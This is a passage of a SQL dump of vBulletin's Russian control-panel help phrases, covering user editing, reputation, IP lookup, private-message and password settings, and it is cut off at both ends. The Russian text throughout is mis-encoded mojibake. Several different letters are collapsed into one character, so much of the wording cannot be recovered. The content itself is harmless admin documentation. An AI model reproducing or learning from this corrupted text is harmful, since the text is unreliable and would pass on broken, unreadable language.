\r\n×òîáû óçíàòü áîëüøå îá ýòîì çàêîíå, ñìîòðèòå çäåñü: http://www.ftc.gov/bcp/edu/pubs/business/idtheft/bus45.shtm.', 'vbulletin', 'zCarot', 1231760784, '3.8.1'), (24235, -1, 'user_add_edit_parentemail_title', 'cphelptext', 'Àäðåñ ýëåêòðîííîé ïî÷òû ðîäèòåëåé', 'vbulletin', '', 0, ''), (24236, -1, 'user_add_edit_posts_text', 'cphelptext', 'Ãòî ñ÷¸ò÷èê ñîîáùåíèé ïîëüçîâàòåëÿ. Ñ÷¸ò÷èê ñîîáùåíèé ïîëüçîâàòåëÿ ìîæåò áûòü èñêóññòâåííî èçìåí¸í ñ ïîìîùüþ ðåäàêòèðîâàíèÿ ýòîãî ïîëÿ.

\r\nÃîìíèòå, ÷òî åñëè âû îáíîâèòå ñ÷¸ò÷èêè ñîîáùåíèé ïîëüçîâàòåëåé çäåñü, òî âñå èçìåí¸ííûå èñêóññòâåííûì îáðàçîì ñ÷¸ò÷èêè âåðíóò ñâîè íàñòîÿùèå çíà÷åíèÿ.', 'vbulletin', 'zCarot', 1205942825, '3.7.0 Release Candidate 1'), (24237, -1, 'user_add_edit_posts_title', 'cphelptext', 'Ñ÷åò÷èê ñîîáùåíèé', 'vbulletin', '', 0, ''), (24238, -1, 'user_add_edit_referrerid_text', 'cphelptext', 'Ââåäèòå ID ïîëüçîâàòåëÿ, êîòîðûé ïðèãëàñèë ýòîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24239, -1, 'user_add_edit_referrerid_title', 'cphelptext', 'Ãåôåððåð', 'vbulletin', '', 0, ''), (24240, -1, 'user_add_edit_ipaddress_text', 'cphelptext', 'Ãòî IP àäðåñ ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24241, -1, 'user_add_edit_ipaddress_title', 'cphelptext', 'IP àäðåñ', 'vbulletin', '', 0, ''), (24242, -1, 'user_add_edit_usergroupid_text', 'cphelptext', 'Âûáåðèòå îñíîâíóþ ãðóïïó äëÿ ýòîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24243, -1, 'user_add_edit_usergroupid_title', 'cphelptext', 'Îñíîâíàÿ ãðóïïà ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24244, -1, 'user_add_edit_membergroupids_text', 'cphelptext', 'Âûáåðèòå âñå äîïîëíèòåëüíûå ãðóïïû ïîëüçîâàòåëåé, ÷ëåíàìè êîòîðûõ ÿâëÿåòñÿ ýòîò ïîëüçîâàòåëü.', 'vbulletin', '', 0, ''), (24245, -1, 'user_add_edit_membergroupids_title', 'cphelptext', 'Äîïîëíèòåëüíûå ãðóïïû ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24246, -1, 'user_add_edit_showreputation_text', 'cphelptext', 'Îïöèÿ îïðåäåëÿåò, áóäåò ëè âèäèìîé ðåïóòàöèÿ ýòîãî ïîëüçîâàòåëÿ äëÿ äðóãèõ ïîñåòèòåëåé ôîðóìà.', 'vbulletin', '', 0, ''), (24247, -1, 'user_add_edit_showreputation_title', 'cphelptext', 'Ãîêàçûâàòü ðåïóòàöèþ', 'vbulletin', '', 0, ''), (24248, -1, 'user_add_edit_reputation_text', 'cphelptext', 'Ââåäèòå òåêóùèé óðîâåíü ðåïóòàöèè ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24249, -1, 'user_add_edit_reputation_title', 'cphelptext', 'Óðîâåíü ðåïóòàöèè', 'vbulletin', '', 0, ''), (24250, -1, 'user_add_edit_reputationpower_text', 'cphelptext', 'Òåêóùèé âåñ ðåïóòàöèè âû÷èñëÿåòñÿ ñ ïîìîùüþ îïöèé, óñòàíîâëåííûõ â ðàçäåëå \"Ãåïóòàöèÿ\" îñíîâíûõ íàñòðîåê. Îòðèöàòåëüíûå êîììåíòàðèè èìåþò ïîëîâèíó ýòîãî âåñà (çà èñêëþ÷åíèåì àäìèíèñòðàòîðîâ, ó íèõ - ïîëíûé).', 'vbulletin', '', 0, ''), (24251, -1, 'user_add_edit_reputationpower_title', 'cphelptext', 'Òåêóùèé âåñ ðåïóòàöèè', 'vbulletin', '', 0, ''), (24252, -1, 'user_add_edit_adminemail_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ïîëó÷àòü ïîëüçîâàòåëü ýëåêòðîííûå ñîîáùåíèÿ îò àäìèíèñòðàöèè, îòïðàâëåííûå àäìèíèñòðàòîðàìè ÷åðåç Ãàíåëü àäìèíèñòðàòîðà -> Ãîëüçîâàòåëè -> Îòïðàâëåíèå ýëåêòðîííîãî ïèñüìà ïîëüçîâàòåëÿì.', 'vbulletin', '', 0, ''), (24253, -1, 'user_add_edit_adminemail_title', 'cphelptext', 'Ãîëó÷àòü ýëåêòðîííûå ïèñüìà îò àäìèíèñòðàöèè', 'vbulletin', '', 0, ''), (24254, -1, 'user_add_edit_showemail_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, ìîæåò ëè ïîëüçîâàòåëü ïîëó÷àòü ýëåêòðîííûå ñîîáùåíèÿ, îòïðàâëåííûå äðóãèìè ó÷àñòíèêàìè.', 'vbulletin', '', 0, ''), (24255, -1, 'user_add_edit_showemail_title', 'cphelptext', 'Ãîëó÷àòü ýëåêòðîííûå ïèñüìà îò äðóãèõ ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24256, -1, 'user_add_edit_invisible_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü áóäåò ñêðûò íà ñòðàíèöå \"Êòî íà ôîðóìå\" äëÿ âñåõ ó÷àñòíèêîâ, êðîìå òåõ, êîòîðûå ñîñòîÿò â ãðóïïàõ ïîëüçîâàòåëåé ñ ðàçðåø¸ííûìè ïðàâàìè ïðîñìîòðà íåâèäèìûõ ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24257, -1, 'user_add_edit_invisible_title', 'cphelptext', 'Ãåâèäèìûé ðåæèì', 'vbulletin', '', 0, ''), (24258, -1, 'user_add_edit_showvcard_text', 'cphelptext', 'Óñòàíàâëèâàÿ ýòó îïöèþ â \"Äà\", âû ðàçðåøèòå ïîëüçîâàòåëÿì çàãðóæàòü vCard èç ïðîôèëÿ ýòîãî ïîëüçîâàòåëÿ. vCard èñïîëüçóþòñÿ âî ìíîæåñòâå ìåíåäæåðîâ êîíòàêòîâ è êëèåíòàõ ýëåêòðîííîé ïî÷òû.', 'vbulletin', '', 0, ''), (24259, -1, 'user_add_edit_showvcard_title', 'cphelptext', 'Ãàçðåøèòü çàãðóçêó vCard', 'vbulletin', '', 0, ''), (24260, -1, 'user_add_edit_receivepm_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, ìîæåò ïîëüçîâàòåëü ïîëó÷àòü ëè÷íûå ñîîáùåíèÿ èëè íåò.', 'vbulletin', '', 0, ''), (24261, -1, 'user_add_edit_receivepm_title', 'cphelptext', 'Ãîëó÷àòü ëè÷íûå ñîîáùåíèÿ (ËÑ)', 'vbulletin', '', 0, ''), (24262, -1, 'user_add_edit_receivepmbuddies_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò ïîëó÷àòü ëè÷íûå ñîîáùåíèÿ òîëüêî îò ïîëüçîâàòåëåé â ñïèñêå çíàêîìûõ è ìîäåðàòîðîâ/àäìèíèñòðàòîðîâ.', 'vbulletin', 'zCarot', 1199284204, '3.7.0 Beta 4'), (24263, -1, 'user_add_edit_receivepmbuddies_title', 'cphelptext', 'Ãîëó÷àòü ëè÷íûå ñîîáùåíèÿ òîëüêî îò çíàêîìûõ è ìîäåðàòîðîâ', 'vbulletin', 'zCarot', 1199283736, '3.7.0 Beta 4'), (24264, -1, 'user_add_edit_emailonpm_text', 'cphelptext', 'Åñëè âêëþ÷åíà, òî ïîëüçîâàòåëü áóäåò ïîëó÷àòü óâåäîìëåíèÿ ïî ýëåêòðîííîé ïî÷òå ïðè ïîëó÷åíèè íîâîãî ëè÷íîãî ñîîáùåíèÿ.', 'vbulletin', '', 0, ''), (24265, -1, 'user_add_edit_emailonpm_title', 'cphelptext', 'Ãîñûëàòü óâåäîìëåíèå ïî ýëåêòðîííîé ïî÷òå ïðè ïîëó÷åíèè ëè÷íîãî ñîîáùåíèÿ', 'vbulletin', '', 0, ''), (24266, -1, 'user_add_edit_pmpopup_text', 'cphelptext', 'Åñëè âêëþ÷åíî, òî ïîëüçîâàòåëþ áóäóò ñîîáùàòü î ïîñòóïëåíèè íîâîãî ëè÷íîãî ñîîáùåíèÿ ÷åðåç âñïëûâàþùåå îêíî (åñëè îí íàõîäèòñÿ íà ôîðóìå).', 'vbulletin', '', 0, ''), (24267, -1, 'user_add_edit_pmpopup_title', 'cphelptext', 'Îòêðûâàòü âñïëûâàþùåå îêíî, êîãäà ïîëó÷åíî ëè÷íîå ñîîáùåíèå', 'vbulletin', '', 0, ''), (24268, -1, 'user_add_edit_showsignatures_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, âèäèò ëè ýòîò ïîëüçîâàòåëü ïîäïèñè â ñîîáùåíèÿõ.', 'vbulletin', '', 0, ''), (24269, -1, 'user_add_edit_showsignatures_title', 'cphelptext', 'Îòîáðàæàòü ïîäïèñè', 'vbulletin', '', 0, ''), (24270, -1, 'user_add_edit_showavatars_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, âèäèò ëè ýòîò ïîëüçîâàòåëü àâàòàðû ïðè ïðîñìîòðå ñîîáùåíèé. Ãîëüçîâàòåëè ñ ìåäëåííûì ñîåäèíåíèåì ìîãóò âûêëþ÷èòü ýòó îïöèþ äëÿ óñêîðåíèÿ çàãðóçêè íà ôîðóìàõ, ãäå ìíîãî áîëüøèõ (ïî ðàçìåðó ôàéëà) àâàòàðîâ.', 'vbulletin', '', 0, ''), (24271, -1, 'user_add_edit_showavatars_title', 'cphelptext', 'Îòîáðàæàòü àâàòàðû', 'vbulletin', '', 0, ''), (24272, -1, 'user_add_edit_showimages_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, âèäèò ëè ýòîò ïîëüçîâàòåëü èçîáðàæåíèÿ, âëîæåííûå â ñîîáùåíèÿ. Ãîëüçîâàòåëè ñ ìåäëåííûì ñîåäèíåíèåì ìîãóò âûêëþ÷èòü ýòó îïöèþ äëÿ óñêîðåíèÿ çàãðóçêè òåì ñ áîëüøèì ÷èñëîì âëîæåííûõ èçîáðàæåíèé.', 'vbulletin', '', 0, ''), (24273, -1, 'user_add_edit_showimages_title', 'cphelptext', 'Îòîáðàæàòü èçîáðàæåíèÿ', 'vbulletin', '', 0, ''), (24274, -1, 'user_add_edit_showusercss_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, âèäèò ëè ýòîò ïîëüçîâàòåëü èçìåíåíèÿ â îòîáðàæåíèè ÷óæèõ ïðîôèëåé', 'vbulletin', 'zCarot', 1199283907, '3.7.0 Beta 4'), (24275, -1, 'user_add_edit_showusercss_title', 'cphelptext', 'Ãîääåðæèâàòü ÷óæèå ñòèëè îòîáðàæåíèÿ ïðîôèëÿ', 'vbulletin', 'zCarot', 1199283907, '3.7.0 Beta 4'), (24276, -1, 'user_add_edit_receivefriendemailrequest_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ýòîò ïîëüçîâàòåëü ïîëó÷àòü óâåäîìëåíèÿ ïî ýëåêòðîííîé ïî÷òå î íîâûõ ïðåäëîæåíèÿõ äðóæáû.', 'vbulletin', 'zCarot', 1199283977, '3.7.0 Beta 4'), (24277, -1, 'user_add_edit_receivefriendemailrequest_title', 'cphelptext', 'Ãîëó÷àòü óâåäîìëåíèÿ î çàïðîñå íà ïîëó÷åíèå ñòàòóñà äðóãà', 'vbulletin', 'zCarot', 1199283977, '3.7.0 Beta 4'), (24278, -1, 'user_add_edit_autosubscribe_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò îáû÷íûé óðîâåíü ïîäïèñêè ïðè îñòàâëåíèè ñîîáùåíèÿ ïîëüçîâàòåëåì.', 'vbulletin', '', 0, ''), (24279, -1, 'user_add_edit_autosubscribe_title', 'cphelptext', 'Àâòîìàòè÷åñêèé ðåæèì ïîäïèñêè íà òåìó', 'vbulletin', '', 0, ''), (24280, -1, 'user_add_edit_threadedmode_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò ôîðìàò îòîáðàæåíèÿ òåìû, ïðè ïðîñìîòðå å¸ ñîîáùåíèé.

\r\n ëèíåéíîì ðåæèìå âñå ñîîáùåíèÿ ðàñïîëàãàþòñÿ â õðîíîëîãè÷åñêîì ïîðÿäêå îò ñòàðûõ ê íîâûì. Òàê âû ìîæåòå ïðîñìàòðèâàòü ñîîáùåíèÿ áåç íåîáõîäèìîñòè íàæèìàòü íà ññûëêè.

\r\n äðåâîâèäíîì ðåæèìå òåìà âûãëÿäèò êàê ñòâîë äåðåâà, ãäå êàæäàÿ âåòêà èìååò îäíî ñîîáùåíèå. Ãòî ïîçâîëÿåò âèäåòü, êòî è íà êàêèå ñîîáùåíèå îòâå÷àë. Îäíîâðåìåííî îòîáðàæàåòñÿ òåêñò òîëüêî îäíîãî ñîîáùåíèÿ.

\r\nÊîìáèíèðîâàííûé ðåæèì îáúåäèíÿåò äâà ïðåäûäóùèõ. Ãàâåðõó ñîîáùåíèÿ îòîáðàæåíû â âèäå äåðåâà, âíèçó - îáû÷íûé ëèíåéíûé âèä.', 'vbulletin', 'zCarot', 1205942524, '3.7.0 Release Candidate 1'), (24281, -1, 'user_add_edit_threadedmode_title', 'cphelptext', 'Âàðèàíòû îòîáðàæåíèÿ òåì', 'vbulletin', '', 0, ''), (24282, -1, 'user_add_edit_showvbcode_text', 'cphelptext', 'Îïöèÿ îïðåäåëÿåò, êàêàÿ ïàíåëü ðåäàêòîðà áóäåò îòîáðàæàòüñÿ ïðè ðàçìåùåíèè ñîîáùåíèé ïîëüçîâàòåëåì. Ãàíåëü ðåäàêòîðà ñîäåðæèò èêîíêè äëÿ ïðîñòîé âñòàâêè ýëåìåíòîâ BB êîäà â ñîîáùåíèÿ.

\r\nÑòàíäàðòíàÿ ïàíåëü ðåäàêòîðà ñîäåðæèò èêîíêè äëÿ âñåõ BB êîäîâ, ïîçâîëÿþùèõ âñòàâëÿòü ãîòîâûé êîä ïðÿìî â ñîîáùåíèå.

\r\nÃàñøèðåííàÿ ïàíåëü âèçóàëüíîãî ðåäàêòîðà âêëþ÷àåò â ñåáÿ ôóíêöèîíàëüíîñòü ñòàíäàðòíîé ïàíåëè, íî åùå è îòîáðàæàåò ñîîáùåíèå òàê, êàê îíî áóäåò âûãëÿäåòü íà ôîðóìå (ïîõîæå, íà ðåäàêòèðîâàíèå â MS WORD).', 'vbulletin', 'zCarot', 1206964550, '3.7.0 Release Candidate 2'), (24283, -1, 'user_add_edit_showvbcode_title', 'cphelptext', 'Èíòåðôåéñ ðåäàêòîðà ñîîáùåíèé', 'vbulletin', '', 0, ''), (24284, -1, 'user_add_edit_styleid_text', 'cphelptext', 'Ãòî ñòèëü, êîòîðûé èñïîëüçóåòñÿ ó ýòîãî ïîëüçîâàòåëÿ äëÿ îòîáðàæåíèÿ ñòðàíèö ôîðóìà. Âûáåðèòå ñòèëü ÿâíî èëè óñòàíîâèòå ýòó îïöèþ â \"Êàê â íàñòðîéêàõ ôîðóìà\", ÷òîáû èñïîëüçîâàòü ñòèëü ïî óìîë÷àíèþ.', 'vbulletin', '', 0, ''), (24285, -1, 'user_add_edit_styleid_title', 'cphelptext', 'Ñòèëü', 'vbulletin', '', 0, ''), (24286, -1, 'user_add_edit_timezoneoffset_text', 'cphelptext', 'Âûáåðèòå ÷àñîâîé ïîÿñ äëÿ ýòîãî ïîëüçîâàòåëÿ â çíà÷åíèÿõ GMT.', 'vbulletin', '', 0, ''), (24287, -1, 'user_add_edit_timezoneoffset_title', 'cphelptext', '×àñîâîé ïîÿñ', 'vbulletin', '', 0, ''), (24288, -1, 'user_add_edit_dstauto_text', 'cphelptext', 'Åñëè \"Äà\", òî âðåìÿ äëÿ ýòîãî ïîëüçîâàòåëÿ áóäåò àâòîìàòè÷åñêè ïåðåâîäèòñÿ ïðè íåîáõîäèìîñòè ñ ëåòíåãî íà çèìíåå è íàîáîðîò.', 'vbulletin', '', 0, ''), (24289, -1, 'user_add_edit_dstauto_title', 'cphelptext', 'Îïðåäåëÿòü ëåòíåå/çèìíåå âðåìÿ àâòîìàòè÷åñêè', 'vbulletin', '', 0, ''), (24290, -1, 'user_add_edit_dstonoff_text', 'cphelptext', 'Åñëè \"Äà\", òî ñåé÷àñ â ÷àñîâîì ïîÿñå ïîëüçîâàòåëÿ ëåòíåå âðåìÿ. Ãòà îïöèÿ ìîæåò áûòü ïðîïóùåíà, åñëè âêëþ÷åíà îïöèÿ \"Îïðåäåëÿòü ëåòíåå/çèìíåå âðåìÿ àâòîìàòè÷åñêè\".', 'vbulletin', '', 0, ''), (24291, -1, 'user_add_edit_dstonoff_title', 'cphelptext', ' íàñòîÿùèé ìîìåíò ëåòíåå âðåìÿ', 'vbulletin', '', 0, ''), (24292, -1, 'user_add_edit_daysprune_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò îáû÷íûé âîçðàñò òåì, âèäèìûõ â ñïèñêå òåì ðàçäåëà ïîëüçîâàòåëåì.', 'vbulletin', '', 0, ''), (24293, -1, 'user_add_edit_daysprune_title', 'cphelptext', 'Äàâíîñòü îòîáðàæàåìûõ òåì ïî óìîë÷àíèþ', 'vbulletin', '', 0, ''), (24294, -1, 'user_add_edit_joindate_text', 'cphelptext', 'Ââåäèòå ñþäà äàòó ðåãèñòðàöèè ïîëüçîâàòåëÿ. Âûáåðèòå ìåñÿö è ââåäèòå äâå öèôðû äíÿ è ÷åòûðå öèôðû ãîäà.', 'vbulletin', '', 0, ''), (24295, -1, 'user_add_edit_joindate_title', 'cphelptext', 'Ãåãèñòðàöèÿ', 'vbulletin', '', 0, ''), (24296, -1, 'user_add_edit_lastactivity_text', 'cphelptext', 'Ââåäèòå äàòó ïîñëåäíåé àêòèâíîñòè ýòîãî ïîëüçîâàòåëÿ íà ôîðóìå. Âûáåðèòå ìåñÿö è ââåäèòå äâå öèôðû äíÿ è ÷åòûðå - ãîäà, äâå - ÷àñà è äâå - ìèíóòû.', 'vbulletin', '', 0, ''), (24297, -1, 'user_add_edit_lastactivity_title', 'cphelptext', 'Ãîñëåäíÿÿ àêòèâíîñòü', 'vbulletin', '', 0, ''), (24298, -1, 'user_add_edit_lastpost_text', 'cphelptext', 'Ââåäèòå äàòó ïîñëåäíåãî ñîîáùåíèÿ îò ýòîãî ïîëüçîâàòåëÿ. Âûáåðèòå ìåñÿö è ââåäèòå äâå öèôðû äíÿ è ÷åòûðå - ãîäà, äâå - ÷àñà è äâå - ìèíóòû.', 'vbulletin', '', 0, ''), (24299, -1, 'user_add_edit_lastpost_title', 'cphelptext', 'Ãîñëåäíåå ñîîáùåíèå', 'vbulletin', '', 0, ''), (24300, -1, 'user_changehistory_text', 'cphelptext', 'Ãòà ñòðàíèöà îòîáðàæàåò èñòîðèþ èçìåíåíèé íåêîòîðûõ ïàðàìåòðîâ ïîëüçîâàòåëÿ, âêëþ÷àÿ:\r\n\r\n
    \r\n
  • Èìåíà ïîëüçîâàòåëåé
  • \r\n
  • Àäðåñà ýëåêòðîííîé ïî÷òû
  • \r\n
  • Ãðèíàäëåæíîñòü ê ãðóïïàì ïîëüçîâàòåëåé
  • \r\n
\r\n\r\nÒàêæå ñîõðàíÿþòñÿ äàííûå î ïîëüçîâàòåëå, êîòîðûé ïðîèçâ¸ë ýòè èçìåíåíèÿ.', 'vbulletin', 'zCarot', 1191257642, '3.7.0 Beta 1'), (24301, -1, 'user_changehistory_title', 'cphelptext', 'Èñòîðèÿ èçìåíåíèé ïîëüçîâàòåëÿ', 'vbulletin', 'zCarot', 1191257642, '3.7.0 Beta 1'), (24302, -1, 'user_doips_text', 'cphelptext', 'Çäåñü âû ìîæåòå ïîñìîòðåòü ñîîòâåòñòâèÿ èìåíè ïîëüçîâàòåëÿ è åãî IP àäðåñîâ, è íàîáîðîò, IP àäðåñà è ïîëüçîâàòåëåé, êîòîðûå åãî èñïîëüçîâàëè.', 'vbulletin', '', 0, ''), (24303, -1, 'user_doips_title', 'cphelptext', 'Ãîèñê ïî IP àäðåñó', 'vbulletin', '', 0, ''), (24304, -1, 'user_doips_ipaddress_text', 'cphelptext', 'Ââåäèòå ñþäà IP àäðåñ, ïî êîòîðîìó æåëàåòå íàéòè ïîëüçîâàòåëåé. Âû ìîæåòå ââåñòè êàê ïîëíûé IP (íàïðèìåð, 123.222.244.211), òàê è ÷àñòè÷íûé (íàïðèìåð, 123, èëè 123.222, èëè 123.222.244, èëè 123.222.2).

Ãîìíèòå: åñëè ó âàñ î÷åíü ìíîãî ñîîáùåíèé, òî ýòîò ïðîöåññ ìîæåò çàíÿòü ïðîäîëæèòåëüíîå âðåìÿ.', 'vbulletin', 'zCarot', 1199736638, '3.7.0 Beta 4'), (24305, -1, 'user_doips_ipaddress_title', 'cphelptext', 'Ãàéòè ïîëüçîâàòåëåé ïî IP àäðåñó', 'vbulletin', '', 0, ''), (24306, -1, 'user_doips_username_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâàòåëÿ, ÷òîáû íàéòè âñå èñïîëüçóåìûå èì IP àäðåñà.', 'vbulletin', '', 0, ''), (24307, -1, 'user_doips_username_title', 'cphelptext', 'Ãàéòè IP àäðåñà ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24308, -1, 'user_doips_depth_text', 'cphelptext', 'Ãðè ãëóáèíå ïîèñêà 1, âàì áóäóò îòîáðàæåíû ëèøü ðåçóëüòàòû ïîèñêà. Ãðè ãëóáèíå 2 - âû ïîëó÷èòå ðåçóëüòàòû ïîèñêà â òàêîì âèäå, êàê áóäòî äëÿ êàæäîãî ïîëó÷åííîãî ðåçóëüòàòà âû ïðîâåëè áû îòäåëüíûé ïîèñê.\r\n

Ãàïðèìåð:

\r\nÈùåì ïîëüçîâàòåëåé ñ IP 127.0.0.1 è ãëóáèíîé ïîèñêà 1: ðåçóëüòàòû \"àäìèí\" è \"zÌàðêîâêà\". Ãðè ïîèñêå ïî IP 127.0.0.1 è ãëóáèíîé 2 ìû ïîëó÷èì: \"àäìèí\" è \"zÌàðêîâêà\", à òàêæå âñå IP àäðåñà, ïîä êîòîðûìè çàõîäèëè ïîëüçîâàòåëè \"àäìèí\" è \"zÌàðêîâêà\".', 'vbulletin', '', 0, ''), (24309, -1, 'user_doips_depth_title', 'cphelptext', 'Ãëóáèíà ïîèñêà', 'vbulletin', '', 0, ''), (24310, -1, 'user_edit_text', 'cphelptext', 'Çäåñü âû ìîæåòå ðåäàêòèðîâàòü ïðîôèëü è íàñòðîéêè ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24311, -1, 'user_edit_title', 'cphelptext', 'Ãåäàêòèðîâàòü ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24312, -1, 'user_edit_receivepmbuddies_text', 'cphelptext', 'Ãòà îïöèÿ îãðàíè÷èâàåò ïðè¸ì ëè÷íûõ ñîîáùåíèé ïîëüçîâàòåëÿìè èç ñïèñêà çíàêîìûõ è ìîäåðàòîðàìè.', 'vbulletin', 'zCarot', 1196775359, '3.7.0 Beta 1'), (24313, -1, 'user_edit_receivepmbuddies_title', 'cphelptext', 'Ãîëó÷àòü ëè÷íûå ñîîáùåíèÿ òîëüêî îò çíàêîìûõ è ìîäåðàòîðîâ', 'vbulletin', 'zCarot', 1196766083, '3.7.0 Beta 1'), (24314, -1, 'user_edit_vm_contactonly_text', 'cphelptext', 'Åñëè \"Äà\", òî ïóáëè÷íûå ñîîáùåíèÿ äëÿ ýòîãî ïîëüçîâàòåëÿ ñìîãóò îòïðàâëÿòü ëèøü òå, êòî íàõîäèòñÿ â åãî ñïèñêå çíàêîìûõ, à òàêæå ìîäåðàòîðû è àäìèíèñòðàòîðû ôîðóìà.', 'vbulletin', 'zCarot', 1207920870, '3.7.0 Release Candidate 4'), (24315, -1, 'user_edit_vm_contactonly_title', 'cphelptext', 'Îãðàíè÷èòü äîñòóï ê îòïðàâêå âàì ïóáëè÷íûõ ñîîáùåíèé òîëüêî çíàêîìûìè è ìîäåðàòîðàìè', 'vbulletin', 'zCarot', 1207920870, '3.7.0 Release Candidate 4'), (24316, -1, 'user_edit_password_text', 'cphelptext', 'Åñëè íåîáõîäèìî ñìåíèòü ïàðîëü ýòîãî ïîëüçîâàòåëÿ, ââåäèòå åãî ñþäà.  äðóãèõ ñëó÷àÿõ îñòàâüòå ïîëå ïóñòûì.', 'vbulletin', '', 0, ''), (24317, -1, 'user_edit_password_title', 'cphelptext', 'Ãàðîëü', 'vbulletin', '', 0, ''), (24318, -1, 'user_editaccess_text', 'cphelptext', 'Çäåñü âû ìîæåòå ðåäàêòèðîâàòü ïðàâà äîñòóïà íà ïîëüçîâàòåëüñêîì óðîâíå (â îòëè÷èå îò ãðóïïîâîãî óðîâíÿ).

\r\nÓáåäèòåñü, ÷òî ìàñêè äîñòóïà âêëþ÷åíû çäåñü, â ïðîòèâíîì ñëó÷àå ðàçðåøåíèÿ íà óðîâíå ïîëüçîâàòåëÿ íå áóäóò ðàáîòàòü.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (24319, -1, 'user_editaccess_title', 'cphelptext', 'Ãåäàêòèðîâàíèå ìàñîê äîñòóïà', 'vbulletin', '', 0, ''), (24320, -1, 'user_emailpassword_text', 'cphelptext', 'Ãàæìèòå íà êíîïêó íèæå, ÷òîáû îòïðàâèòü íàïîìèíàíèå ïàðîëÿ äàííîìó ïîëüçîâàòåëþ.', 'vbulletin', '', 0, ''), (24321, -1, 'user_emailpassword_title', 'cphelptext', 'Ãàïîìèíàíèå ïàðîëÿ ïîëüçîâàòåëþ ïî ýëåêòðîííîé ïî÷òå', 'vbulletin', '', 0, ''), (24322, -1, 'user_find_text', 'cphelptext', 'Ãòî ðåçóëüòàòû âàøåãî ïîèñêà.', 'vbulletin', '', 0, ''), (24323, -1, 'user_find_title', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24324, -1, 'user_find2_text', 'cphelptext', 'Ãòî ðåçóëüòàòû âàøåãî ïîèñêà.', 'vbulletin', '', 0, ''), (24325, -1, 'user_find2_title', 'cphelptext', 'Ãîèñê ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24326, -1, 'user_moderate_text', 'cphelptext', 'Ñëåäóþùèå ïîëüçîâàòåëè îæèäàþò ïðîâåðêè. Âû ìîæåòå ïðèíÿòü, óäàëèòü èëè èãíîðèðîâàòü ýòè ðåãèñòðàöèè.', 'vbulletin', '', 0, ''), (24327, -1, 'user_moderate_title', 'cphelptext', 'Ãîëüçîâàòåëè, îæèäàþùèå ïðîâåðêè', 'vbulletin', '', 0, ''), (24328, -1, 'user_moderate_send_validated_text', 'cphelptext', 'Âûáåðèòå \"Äà\" äëÿ îòïðàâêè ýëåêòðîííûõ ïèñåì ïîëüçîâàòåëÿì, ðåãèñòðàöèè êîòîðûõ âû ïðèíÿëè. Åñëè íå æåëàåòå îòïðàâëÿòü, âûáåðèòå \"Ãåò\".', 'vbulletin', '', 0, ''), (24329, -1, 'user_moderate_send_validated_title', 'cphelptext', 'Ãîñëàòü ýëåêòðîííûå ïèñüìà ïîëüçîâàòåëÿì, êîòîðûå áûëè ïðèíÿòû', 'vbulletin', '', 0, ''), (24330, -1, 'user_moderate_send_deleted_text', 'cphelptext', 'Âûáåðèòå \"Äà\" äëÿ îòïðàâêè ýëåêòðîííûõ ïèñåì ïîëüçîâàòåëÿì, ðåãèñòðàöèè êîòîðûõ âû óäàëèëè. Åñëè íå æåëàåòå îòïðàâëÿòü, âûáåðèòå \"Ãåò\".', 'vbulletin', '', 0, ''), (24331, -1, 'user_moderate_send_deleted_title', 'cphelptext', 'Ãîñëàòü ýëåêòðîííûå ïèñüìà ïîëüçîâàòåëÿì, êîòîðûå áûëè óäàëåíû', 'vbulletin', '', 0, ''), (24332, -1, 'user_modify_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå çàäàòü ðàçëè÷íûå ïàðàìåòðû ïîèñêà ïîëüçîâàòåëåé. Çäåñü æå íàõîäÿòñÿ îïöèè \"Ãûñòðûé ïîèñê\" è \"Ãàñøèðåííûé ïîèñê\".

